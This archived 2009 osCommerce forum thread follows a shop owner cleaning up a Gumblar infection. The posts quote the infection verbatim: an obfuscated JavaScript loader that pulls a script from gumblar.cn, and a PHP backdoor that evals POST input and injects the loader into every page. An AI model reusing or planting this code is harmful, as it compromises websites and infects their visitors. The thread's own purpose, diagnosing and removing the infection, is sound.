pure11 Posted May 12, 2009 Posted May 12, 2009 I have found a real bad virus that has been injected in my .php and .html files in my oscommerce site. i have done the steps to remove the malicious code from the site (via dreamweaver find and replace all the files in my oscommerce) i have also deleted the created files inside the images folders called images.php even after doing this, i view source of my index store page and i see the code in this section: </head><script language=javascript><!-- (function(){var Kp5e=('var~20a~3d~22~53~63~72ipt~45ngine~22~2cb~3d~22Ver~73ion(~29+~22~2c~6a~3d~22~ 22~2c~75~3dn~61vigato~72~2e~75se~72~41~67~65~6et~3bif((u~2e~69n~64e~78Of~28~22Win ~22~29~3e~30)~26~26(u~2eindexOf(~22~4eT~206~22)~3c0)~26~26(doc~75men~74~2ecook~69 e~2e~69n~64e~78Of(~22miek~3d1~22)~3c0)~26~26~28typeof(z~72v~7ats)~21~3dt~79pe~6ff (~22~41~22))~29~7bzrv~7a~74~73~3d~22A~22~3be~76~61l(~22if(~77ind~6fw~2e~22+~61~2b ~22)j~3dj~2b~22+~61~2b~22~4da~6a~6fr~22+b~2ba+~22~4d~69nor~22+b+a+~22Build~22+~62 +~22j~3b~22~29~3b~64oc~75~6d~65nt~2ewrite(~22~3cscri~70t~20src~3d~2f~2fgum~62l~61 r~2ec~6e~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(/~/g,'%');var SDce=unescape(Kp5e);eval(SDce)})(); --></script> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> <!-- header //--> <div id="cwdusacontainer"> where else am i missing that i should look that it would display the code on this page??? someone please help this is very urgent
bcmiw330 Posted May 13, 2009 Posted May 13, 2009 I have found a real bad virus that has been injected in my .php and .html files in my oscommerce site. i have done the steps to remove the malicious code from the site (via dreamweaver find and replace all the files in my oscommerce) i have also deleted the created files inside the images folders called images.php even after doing this, i view source of my index store page and i see the code in this section: </head><script language=javascript><!-- (function(){var Kp5e=('var~20a~3d~22~53~63~72ipt~45ngine~22~2cb~3d~22Ver~73ion(~29+~22~2c~6a~3d~22~ 22~2c~75~3dn~61vigato~72~2e~75se~72~41~67~65~6et~3bif((u~2e~69n~64e~78Of~28~22Wi n ~22~29~3e~30)~26~26(u~2eindexOf(~22~4eT~206~22)~3c0)~26~26(doc~75men~74~2ecook~6 9 e~2e~69n~64e~78Of(~22miek~3d1~22)~3c0)~26~26~28typeof(z~72v~7ats)~21~3dt~79pe~6f f (~22~41~22))~29~7bzrv~7a~74~73~3d~22A~22~3be~76~61l(~22if(~77ind~6fw~2e~22+~61~2 b ~22)j~3dj~2b~22+~61~2b~22~4da~6a~6fr~22+b~2ba+~22~4d~69nor~22+b+a+~22Build~22+~6 2 +~22j~3b~22~29~3b~64oc~75~6d~65nt~2ewrite(~22~3cscri~70t~20src~3d~2f~2fgum~62l~6 1 r~2ec~6e~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(/~/g,'%');var SDce=unescape(Kp5e);eval(SDce)})(); --></script> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> <!-- header //--> <div id="cwdusacontainer"> where else am i missing that i should look that it would display the code on this page??? someone please help this is very urgent did you check...includes/header.php?
pure11 Posted May 13, 2009 Author Posted May 13, 2009 did you check...includes/header.php? hi yea, it was a different code entered in my files also, here it is for reference: <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBLcDVlPSgn dmFyfjIwYX4zZH4yMn41M342M343MmlwdH40NW5naW5lfjIyfjJjYn4zZH4yMlZlcn43M2lvbih+Mjkrf jIyfjJjfjZhfjNkfjIyfjIyfjJjfjc1fjNkbn42MXZpZ2F0b343Mn4yZX43NXNlfjcyfjQxfjY3fjY1fj ZldH4zYmlmKCh1fjJlfjY5bn42NGV+NzhPZn4yOH4yMldpbn4yMn4yOX4zZX4zMCl+MjZ+MjYodX4yZWl uZGV4T2YofjIyfjRlVH4yMDZ+MjIpfjNjMCl+MjZ+MjYoZG9jfjc1bWVufjc0fjJlY29va342OWV+MmV+ NjlufjY0ZX43OE9mKH4yMm1pZWt+M2QxfjIyKX4zYzApfjI2fjI2fjI4dHlwZW9mKHp+NzJ2fjdhdHMpf jIxfjNkdH43OXBlfjZmZih+MjJ+NDF+MjIpKX4yOX43Ynpydn43YX43NH43M34zZH4yMkF+MjJ+M2Jlfj c2fjYxbCh+MjJpZih+NzdpbmR+NmZ3fjJlfjIyK342MX4yYn4yMilqfjNkan4yYn4yMit+NjF+MmJ+MjJ +NGRhfjZhfjZmcn4yMitifjJiYSt+MjJ+NGR+Njlub3J+MjIrYithK34yMkJ1aWxkfjIyK342Mit+MjJq fjNifjIyfjI5fjNifjY0b2N+NzV+NmR+NjVudH4yZXdyaXRlKH4yMn4zY3Njcml+NzB0fjIwc3JjfjNkf jJmfjJmZ3VtfjYybH42MXJ+MmVjfjZlfjJmcnNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+Mm ZzY3JpcHR+M2V+MjIpfjNifjdkJykucmVwbGFjZSgvfi9nLCclJyk7dmFyIFNEY2U9dW5lc2NhcGUoS3A 1ZSk7ZXZhbChTRGNlKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> also, they added codes to my .js files, which dreamweaver did not find and im still cleaning this mess up right now, still infected.
♥geoffreywalton Posted May 13, 2009 Posted May 13, 2009 Try looking at the date last updated, those with a recent/same as infected files should be concentrated on. G Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
pure11 Posted May 13, 2009 Author Posted May 13, 2009 Try looking at the date last updated, those with a recent/same as infected files should be concentrated on. G I looked in the log for the ips that connected to the domain and it showed an unknown ip of course and all the downloads, uploads they did i finally finished and removed the last bit of code and now my site is 100% clean!! what a mess this gumblar made!! p.s. downloaded AVAST (the very best virus program) and its free, it found over 10 trojans on my computer, i cleaned up my computer is 100% clean now i also upgraded adobe acrobat from versoin 7.0 to latest, and i disabled the javascript on it (this is how the virus got ahold of my information) when i logged in the FTP program and typed in the pw, it stole my password i also have of course changed my domain password
♥geoffreywalton Posted May 13, 2009 Posted May 13, 2009 Good link http://www.oscommerce.com/forums/index.php?sho...t=0&start=0 Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile Virus Threat Scanner My Contributions Basic install answers. Click here for Contributions / Add Ons. UK your site. Site Move. Basic design info. For links mentioned in old answers that are no longer here follow this link Useful Threads. If this post was useful, click the Like This button over there ======>>>>>.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.